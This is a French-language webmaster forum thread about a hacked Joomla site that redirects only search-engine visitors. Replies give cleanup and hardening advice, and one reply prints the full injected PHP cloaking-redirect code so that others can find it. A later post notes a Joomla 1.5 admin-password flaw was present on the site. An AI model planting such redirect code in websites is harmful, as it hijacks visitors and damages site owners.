Aller au contenu

Sujets conseillés

Posté

Bonjour,

Mon site internet créé sur Joomla a été piraté mais je ne trouve pas ou est le code malveillant.

Mon site est http://www.quermaurelle.com

Lorsque l'on accède directement au site par l'url tout fonctionne bien, mais lorsque l'on passe par les moteurs de recherche il y a une redirection.

Est ce que quelqu'un pourrait m'aider ou me donner le nom d'une entreprise qui pourrait le faire.

Merci de vos réponses.

Posté

Bonjour,

Tu as eu une injection du code qui fait la redirection. Il faut que tu regardes dans tes templates, fichiers et repertoires qui sont accessibles en ecritures (777), base de données, ...

Le problème c'est que ce type de code est souvent crypté donc il est impossible de trouver une chaine de caractere (par exemple l'url destination).

Commence par le template... il y a p-e un code JS quelque part dans le template.

Posté

recherche un code dans tes scripts qui ressemble à ça :

error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: [l'adresse du site de destination que je ne mentionne pas exprès]"); exit(); } } } }

Il y'a un "cloaking", seuls les moteurs de recherche voient la redirection, c'est ce qui empêche la détection du problème !!

Posté

Et on peut regarder les dates des dernières modifications des fichiers. S'il y a un fichier modifié très récemment, il est probablement incriminé.

  • 3 semaines plus tard...
Posté (modifié)

Bonjour,

je viens de me faire hacker le serveur

je pense que l'attaque venait par les sites joomla

Dan a remis mon serveur à plat, merci Dan, merci Arlette,

voici les infos trouvées suite à ma mésaventure.

je voudrais mettre en garde ceux à qui ca pourrait arriver


/>http://www.tux-planet.fr/faille-de-securite-dans-joomla-15x-remote-admin-password-change/

URGENT!! mettre à jour vos sites joomla en 2.5

je viens de tester sur le site le quermaurelle, la faille est présente, un formulaire apparait (je n'ai pas été plus loin)

autre info trouvée, concernant DirectAdmin,

voici les erreurs (de débutant que j'ai faites) à ne pas commettre:
/>http://www.edelweisshosting.net/index.php?topic=4380.0

;) à part pour les skins (suis pas féru des skins)

et pour "sécuriser" autant que faire se peut... un site Joomla

voici quelques conseils simples et concis à respecter
/>http://www.revue-hebergement-web.com/tutoriel/joomla/securiser-joomla.php
/>http://www.support-joomla.com/administration/securite

et en dernier recours, y'a aussi ça:
/>http://www.shantee.net/comment-changer-le-nom-du-repertoire-qadministratorq-pour-plus-de-securite-avec-joomla.html

*edit

je réinstalle mes sites (mis à jour) petit à petit,

je m'inquiète de savoir si dans mes sources joomla

je n'ai pas embarqué une infection, certains sites étant des upgrades d'upgrade

et je conseille ce post: http://forum.ovh.com/showthread.php?t=49433

qui traite des infections par iframe et

pour sécuriser encore plus un site joomla ou autre CMS d'ailleurs.

Bonjour,

Mon site internet créé sur Joomla a été piraté mais je ne trouve pas ou est le code malveillant.

Mon site est http://www.quermaurelle.com

Lorsque l'on accède directement au site par l'url tout fonctionne bien, mais lorsque l'on passe par les moteurs de recherche il y a une redirection.

Est ce que quelqu'un pourrait m'aider ou me donner le nom d'une entreprise qui pourrait le faire.

Merci de vos réponses.

Modifié par Lutin Jaune
Posté

autre info trouvée, concernant DirectAdmin,

voici les erreurs (de débutant que j'ai faites) à ne pas commettre:
/>http://www.edelweisshosting.net/index.php?topic=4380.0

;) à part pour les skins (suis pas féru des skins)

Leur conseil pour l'utilisation du skin "anglais" est correct, sauf si, comme dans le cas des serveurs que j'installe, une traduction française A JOUR est disponible (ou du moins a été développée et tenue à jour) ;)

Toutes les fonctionnalités sont donc accessibles, même avec le skin en langue française.

Posté

je ne disais pas que l'histoire du skins était fausse,

je disais juste que j'avais pas commis cette erreur

puisque j'utilise toujours des skins garantis d'origine.

(3 erreurs sur 4 c'était déjà pas mal)

Merci Dan,

Leur conseil pour l'utilisation du skin "anglais" est correct, sauf si, comme dans le cas des serveurs que j'installe, une traduction française A JOUR est disponible (ou du moins a été développée et tenue à jour) ;)

Toutes les fonctionnalités sont donc accessibles, même avec le skin en langue française.

Veuillez vous connecter pour commenter

Vous pourrez laisser un commentaire après vous êtes connecté.



Connectez-vous maintenant
×
×
  • Créer...